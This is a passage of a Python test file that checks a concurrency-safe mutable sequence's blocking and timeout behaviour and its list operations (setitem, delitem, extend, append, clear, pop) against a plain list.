((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 
'params': ((), { 'el_1': (csmseq, csmseq.__setitem__.__name__), 'params_1': ((0, "A"), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmseq[0:] = fix_init_csmseqdata # test_blocking - c_set execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_set.__name__), 'params_1': ((0, "A"), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmseq[0:] = fix_init_csmseqdata # test_blocking - __iter__ execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), 
join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__iter__.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - __reversed__ execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__reversed__.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((reversed(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # 
test_blocking - contains execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__contains__.__name__), 'params_1': ((fix_init_csmseqdata[0],), {}), 'el_2': ft.c_identity, 'params_2': ((True,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - len execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 
'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__len__.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - c_len execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_len.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - count execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), 
execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': ((fix_init_csmseqdata[0],), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.count(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.index.__name__), 'params_1': ((fix_init_csmseqdata[0],), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.index(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, 
_min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) fix_exec.c_join() # noinspection PyArgumentList def test_csmlseqdata_non_concurrent( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmlseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableLengthSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmlseq: csdata.Pr.CSMutableLengthSequence[Any] = cast(csdata.Pr.CSMutableLengthSequence[Any], fix_csmlseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) csmlseq_twin: List[Any] = list(fix_init_csmseqdata) # setitem - diff len for setitem_name in (csmlseq.__setitem__.__name__, csmlseq.c_set.__name__): # incr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(1, 2), (1, "asdf", 242.54)), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(1, 2), (1, "asdf", 242.54)), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 2 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # setitem append fix_exec.c_exec_multiple( 
csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(init_len, init_len + 10), (1, "asdf", 242.54)), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply( el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(init_len, init_len + 10), (1, "asdf", 242.54)), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # setitem append 2 fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(init_len + 5, init_len + 10), (1, "asdf", 242.54)), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply( el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(init_len + 5, init_len + 10), (1, "asdf", 242.54)), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, 
csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # setitem decr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(0, 3), (1, "asdf")), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(0, 3), (1, "asdf")), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # delitem for delitem_name in (csmlseq.__delitem__.__name__, csmlseq.c_delete.__name__): # int index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((2,), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), 
csmlseq_twin.__delitem__.__name__), apply_params=( (2,), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # int IndexError fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((-(init_len + 1),), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((-(init_len + 1000),), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((init_len,), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((init_len + 1000,), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager ) # slice index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 
'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((slice(1, 3),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (slice(1, 3),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 2 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # slice index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((slice(init_len - 2, init_len + 100),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (slice(init_len - 2, init_len + 100),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 2 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # slice index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), 
{ 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((slice(init_len, init_len + 100),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (slice(init_len, init_len + 100),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) # iadd, extend, c_extend for extend_name in (csmlseq.__iadd__.__name__, csmlseq.extend.__name__, csmlseq.c_extend.__name__): fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), extend_name), 'apply_params': (((2, "asb", 3.5),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.extend.__name__), apply_params=( ((2, "asb", 3.5),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata 
csmlseq_twin[0:] = fix_init_csmseqdata # append, c_append for append_name in (csmlseq.append.__name__, csmlseq.c_append.__name__): fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), append_name), 'apply_params': (("asb",), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.append.__name__), apply_params=( ("asb",), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # clear fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.clear.__name__), 'apply_params': None }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.clear.__name__), apply_params=None) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 
'el': 0 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # pop fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.pop.__name__), 'apply_params': None }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.pop.__name__), apply_params=None) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # pop - index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.pop.__name__), 'apply_params': ((2,), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.pop.__name__), apply_params=( (2,), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': 
ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # pop - index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.pop.__name__), 'params_1': ((2,), {}), 'el_2': (csmlseq_twin, csmlseq_twin.pop.__name__), 'params_2': ((2,), {}) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # remove fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 